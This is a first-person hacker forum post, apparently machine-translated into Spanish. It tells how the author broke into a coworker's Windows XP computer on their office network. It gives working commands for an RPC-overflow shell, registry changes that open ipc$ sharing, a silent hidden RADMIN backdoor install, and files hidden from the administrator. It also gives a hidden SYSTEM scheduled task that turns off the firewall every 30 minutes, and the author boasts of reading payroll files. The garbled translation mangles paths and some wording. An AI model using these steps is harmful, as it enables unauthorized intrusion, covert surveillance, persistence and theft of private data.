Se recomienda no perder el tiempo
Puedes invadir a través de 135. Esta es la vulnerabilidad más común en el sistema XP y es muy fácil. >También hay un artículo que lo ha hecho con éxito. Ejemplo
Como referencia
Primero abrí el símbolo del sistema y utilicé el comando ping para hacer ping. Responder desde 192.168.16.4: bytes=32 tiempo<1ms TTL=128, explicación La otra parte no tiene un firewall, por lo que es posible una intrusión. A continuación, utilicé X-SCAN 3.2 para escanearlo en detalle. El sistema operativo de la computadora de la otra parte es XP. Todo el mundo sabe que el sistema XP es bastante seguro. Hay muchas discusiones sobre la invasión de XP en algunos foros de piratas informáticos. Hay dos formas de invadir dicho sistema. Una es utilizar el phishing, que es una forma pasiva de permitir que la otra parte lo controle con un caballo de Troya. El segundo método es si la otra parte tiene una vulnerabilidad grave, como un desbordamiento de RPC. En este caso, utilice el programa de desbordamiento para desbordarlo y luego cargue el programa de control para el control. Los resultados del escaneo realmente me hicieron feliz por un tiempo. La computadora de la otra parte tenía una gran cantidad de vulnerabilidades. Una de las más famosas fue la vulnerabilidad RPC explotada por Shockwave. Esta vulnerabilidad fue bastante famosa y arrasó en todo el mundo. Sabiendo que tenía esta vulnerabilidad, el siguiente paso fue encontrar un programa de desbordamiento. Esto me mantuvo ocupado por un tiempo, porque algunos programas de desbordamiento parecían no ser efectivos en esta computadora. Ni siquiera recuerdo los nombres de estas herramientas, pero hay bastantes. Finalmente, se encontró un programa de desbordamiento XP.EXE, y este programa finalmente desbordó la computadora. Tengo un CMDSHELL. Esto puede considerarse una pequeña victoria.
Obtuve CMDSHELL, ¿cómo debo cargarle el programa de control? Lo pensé por un tiempo y finalmente me vino la inspiración. Estamos en la misma red de área local y lo más conveniente es usar *** para cargar. Entonces abrí Mis sitios de red, revisé las computadoras del grupo de trabajo, encontré esta computadora, hice doble clic en ella, pero no pude ingresar. No podía recordar el mensaje. Según mi análisis, es posible que la otra computadora no lo hiciera. ejecute el asistente de instalación de red porque era un sistema XP. Para usar *Share para transferir archivos, debe ejecutar este asistente para configurar una política de seguridad local. Puede abrir "Panel de control-Herramientas administrativas-Política de seguridad local". " y ampliar “Política Local”-“Asignación de derechos de Usuario”. A la derecha hay una política de seguridad: "Denegar el acceso a esta computadora desde la red". Creo que la política correspondiente en la computadora de la otra parte debe tener configurado al usuario INVITADO. Es por eso que no puedo abrir su recurso compartido ***, porque de forma predeterminada, el acceso al recurso compartido *** está registrado como usuario GEUST. , porque su configuración de seguridad no permite que INVITADO acceda desde la red, por lo que no puedo acceder a su ***. Porque el modo de compartir predeterminado de XP es compartir archivos simplemente. Esto es diferente del sistema WIN2000. Si es un sistema WIN2000, si conoce la contraseña del administrador, puede usar el comando net use IPipc$ "contraseña" /usuario: nombre de usuario para establecer una conexión ipc$ con la otra parte y. lo que sigue es copiar el programa troyano ipd$ para cargar el troyano. Este no es el caso con XP. Incluso si conoce su contraseña de administrador y utiliza el comando anterior, no podrá establecer una conexión ipc$. Por eso XP es más seguro que los sistemas 2000. Lo que quiero hacer a continuación es modificar el modo de compartir XP al modo de compartir 2000.
El método es el siguiente: En el CMDSHELL obtenido por el desbordamiento, escriba el comando:
echo Editor del Registro de Windows Versión 5.00 >c:123.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >> c:123.reg
echo. >>c:123.reg
echo "forceguest"=dword:00000000 >>c:123.reg
regedit /e c:123 .reg
Después de escribir estos comandos, el modo para compartir XP de la otra parte será el mismo que el de 2000. Permítame explicarle el significado de estos comandos. El comando echo Editor del Registro de Windows Versión 5.00 >c:123.reg guarda los caracteres del Editor del Registro de Windows Versión 5.00 en el archivo c:123.reg. Todos deben prestar atención a la diferencia entre > en la primera oración y >> en las siguientes oraciones. El carácter > se sobrescribe, >> se agrega y el eco en la tercera oración es el comando >>c:123.reg. Es agregar una línea en blanco. Esta oración es muy importante. Si no agrega esta oración, no tendrá éxito. Simplemente abra un archivo de registro y mire. El formato es así. Esto debe tenerse en cuenta. Después de ejecutar los primeros cuatro comandos, se genera un archivo 123.reg en la unidad C de la otra parte con el siguiente contenido:
Editor del Registro de Windows versión 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
El quinto comando es importar este archivo REG al registro. Después de ejecutar estos cinco comandos, puedo usar ipc$ para controlarlo como si estuviera operando el sistema 2000. A continuación, cargue el programa de control. Elegí el programa de servicio RADMIN2.0. Alguien preguntó que esta instalación requiere una interfaz gráfica. Le dije que no tiene por qué ser tan problemático. Se puede instalar en CMDSHELL. Necesitamos prepararnos antes de la instalación. Primero, genere un archivo REG. El nombre del archivo es: aaa.reg. El contenido es el siguiente:
Editor del Registro de Windows Versión 5.00
[HKEY_LOCAL_MACHINESYSTEMRAdminv2. .0ServerParameters]
"DisableTrayIcon"=hex:01,00,00,00
La función es permitir que el programa del servidor generado oculte el ícono en la barra de notificaciones. Sabemos que después de que el programa del servidor RADMIN se instala normalmente, hay un pequeño ícono en la barra de notificaciones. Si queremos invadir la casa de alguien, por supuesto debemos eliminar este pequeño ícono, de lo contrario seremos descubiertos. Luego genere un archivo BAT, al que llamé aaa.bat, con el siguiente contenido:
r_server /install /silence
r_server.exe /port:2233 /pass:1 /save /silence
regedit.exe /s aaa.reg
net start r_server
Estos comandos son comandos de instalación. Configure el puerto de conexión en: 2233. La contraseña. es: 1. Instalación oculta Después de instalar a través de la interfaz, importe aaa.reg al registro e inicie el servicio r_server.
Una vez completados los preparativos, es hora de cargar los archivos. Se deben cargar cuatro archivos a la vez, aaa.reg aaa.bat r_server.exe admdll.dll y los dos últimos archivos están en. el directorio de instalación de RADMIN Sí, después de instalar el cliente RADMIN2.0, existen estos dos archivos en el directorio de instalación. Primero establezco la conexión ipc$ net use 192.168.16.4ipc$ "" /user:administrator Consejo: El comando se completó correctamente. Siguiente:
copiar r_server 192.168.1.4admin$system32
copiar aaa.bat 192.168.1.4admin$system32
copiar aaa.reg 192.168.1.4admin$ system32
copia admdll.dll 192.168.1.4admin$system32
Luego ingresa el CMDSHELL obtenido por el desbordamiento y escribe:
attrib +s +h +r c : windowssystem32r_server.exe
attrib +s +h +r c:windowssystem32admdll.exe
attrib +s +h +r c:windowssystem32aaa.bat
attrib +s + h +r c:windowssystem32aaa.reg
Estos comandos configuran estos cuatro archivos como archivos ocultos de solo lectura en el sistema, lo que hace que sea menos probable que sean descubiertos por el otro administrador.
El siguiente paso es ejecutar aaa.bat. Es tan simple como eso. Después de que la operación fue exitosa, utilicé el cliente radmin2.0 para configurar los parámetros de conexión. La conexión fue exitosa. La contraseña fue 1. Éxito para ver la pantalla de la otra parte. Jaja, fue un éxito. Solo pasaron 4 cortos días desde la idea de la intrusión hasta el control exitoso de la invasión.
Después de ingresar, vi que la otra parte estaba jugando el juego QQ Royale en su computadora, pero también cometí un error al crear un nuevo usuario administrativo para él. conexión ipc$, pero lo cargué. Olvidé eliminarlo después de tomar el control de RADMIN. Accidentalmente escribí el comando EXIT en el CMDSHELL desbordado. Como resultado, la otra computadora mostró una cuenta regresiva para apagar la interfaz. Si hubiera usado la función CMD de RADMIN en ese momento, escribí el comando apagado -A puede cancelar la cuenta regresiva para apagar la interfaz, pero no lo manejé a tiempo en ese momento, lo que causó el otro. La computadora de la otra parte se reinicie. Después de reiniciar, supongo que el administrador de la otra parte vio mi usuario recién creado. Más tarde, cuando usé RADMIN para verlo de forma remota, también sentí que este nuevo usuario es demasiado ostentoso. Es una gran flor roja.
Por la tarde descubrí que el administrador de esa computadora había contratado a un experto para ayudar, porque cada computadora en nuestra LAN está conectada a Internet a través de la computadora de nuestra oficina, así que el experto fue primero a Nuestra computadora de la oficina para verificar y no encontró problemas, luego reemplazó el Jiangmin instalado originalmente con Kabbah. Supongo que pensó que el ataque provenía de Internet. ¿No sabía que los piratas informáticos estaban justo delante de sus narices? . . . El maestro instaló Kabbah en la computadora que yo controlaba. El software antivirus original era Norton y también actualizó WINDOWS, pero estos métodos son demasiado tarde porque ya lo he controlado y los parches son inútiles. Después de una inspección y reparación por parte del experto, mi puerta trasera todavía existe. Parece que el nivel del experto no es muy bueno. Abrí la función ipc$, pero tampoco la encontró. Tal vez simplemente pensó que era un simple ataque de virus y lo tomó a la ligera, sin saber que todos sus movimientos estaban bajo mi vigilancia. Ja ja. . .
El siguiente trabajo es relativamente simple para mí. Abro el servidor telnet y abro el "Escritorio remoto". Después de salir del trabajo al mediodía, espero a que se abra la computadora. Después de que el administrador de la computadora se fue, inició sesión con RADMIN y realizó algunas configuraciones. Más tarde, revisé los archivos de esta computadora a través de la función de administración de archivos de RADMIN. Había algunos estados financieros, tablas salariales y cosas por el estilo, pero no me resultaron muy atractivos. Pero vi el salario del jefe de nuestro grupo, ¡que es más de 10.000 yuanes al mes! ! Tan oscuro. . . Tanto, pero mi salario es sólo de unos cientos de yuanes. Es realmente injusto y estoy indignado. . . .
Más tarde, el administrador me descubrió accidentalmente cuando estaba operando la computadora de la otra parte a través de RADMIN. Creo que el administrador de la otra parte también estaba muy sorprendido. Había aplicado parches de Windows e instalado el poderoso Kappa, pero. ¡Aun así lo hizo! ¡Hacker inseguro! ! Jaja, porque Kabbah no mató a RADMIN. Más tarde, el administrador de la otra parte habilitó la función de firewall en la "Conexión de área local" de la LAN, por lo que no pude conectarme a su computadora. Debido a que RADMIN es una conexión directa, no se puede utilizar cuando la otra parte tiene un firewall. Una tarde, después de salir del trabajo, accidentalmente hice ping a la IP de esta computadora y hubo una respuesta. Significa que el firewall de la otra parte está cerrado. Inmediatamente utilicé RADMIN para conectarme y fue exitoso. Estoy mareado. . . Resulta que la otra parte solo abrió el firewall y no encontró esta puerta trasera obvia. Creo que fue el experto en informática quien activó el firewall. El administrador no habría pensado en este método según su nivel. Sin embargo, el servidor telnet se cerró, el escritorio remoto 3389 también se cerró y el modo compartido volvió a su estado original. Parece que el experto también descubrió algunas lagunas y las solucionó, pero no descubrió la puerta trasera, lo que me creó una segunda oportunidad de invadir. Él tiene políticas y yo tengo contramedidas. Él puede activar el firewall y yo puedo desactivarlo. Algunas personas preguntan si el administrador vuelve a activar el firewall, ¿no significaría que no queda nada por hacer? ? Ja ja. . . ¡Le daré a continuación una receta secreta única que he investigado yo mismo y que garantiza curar todas las enfermedades! Ja ja. . . .
Mi enfoque es crear una tarea programada oculta. Deje que esta tarea programada elimine el firewall cada media hora, de modo que incluso si el administrador de la otra parte abre el firewall, no tendrá ningún efecto.
El método es el siguiente: primero cree un archivo por lotes abc.bat y colóquelo en el directorio c: windowssystem32. El contenido es el siguiente:
net stopsharedaccess
Por supuesto, También puedes agregar algo más, como Digamos que quieres eliminar Skynet Firewall en media hora, puedes agregar el siguiente comando:
taskkill /IM rfw.exe /f
Si desea utilizar el modo para compartir ***. Es un modo para compartir avanzado *, puede agregar el siguiente comando:
regedit /e c:windowssystem32abc.reg
Por supuesto, esto requiere cargar un abc.reg en su directorio c de antemano: windowssystem32, el contenido es el siguiente:
Editor del Registro de Windows Versión 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
Permítanme hablar sobre cómo crear una tarea programada oculta:
Escriba el comando en CMDSHELL en la computadora de la otra parte:
schtasks /create /tn "Resident" /tr c:windowssystem32abc. bat /sc minute /mo 30 /ru "system"
Esto crea una tarea programada que se ejecuta con permisos de SISTEMA en la computadora de la otra parte. La tarea programada se ejecuta cada 30 minutos c: windowssystem32abc.bat, la función se determina en función de la línea de comando en abc.bat. Se puede decir que este nuevo descubrimiento es bastante poderoso si se usa inteligentemente, la función puede ser bastante poderosa. Si esto por sí solo no puede cumplir con los requisitos ocultos, aún puede descubrir su existencia abriendo el Panel de control - Programador de tareas. Bien, aquí se explica cómo ocultarlo. O ingrese CMDSHELL. Escriba el comando attrib +h c:windowstasks residente.job y presione Entrar. Luego vaya al programa de tareas en el panel de control para ver si las tareas anteriores han desaparecido. Esto sólo desaparece en la superficie, pero en realidad todavía existe. Puede escribir el comando: schtasks en CMDSHELL para verlo. De esta forma, no importa cómo el administrador de la otra parte modifique la configuración, las modificaciones se realizarán cada media hora. Es extremadamente difícil que se salga de mi control. Ja ja. . .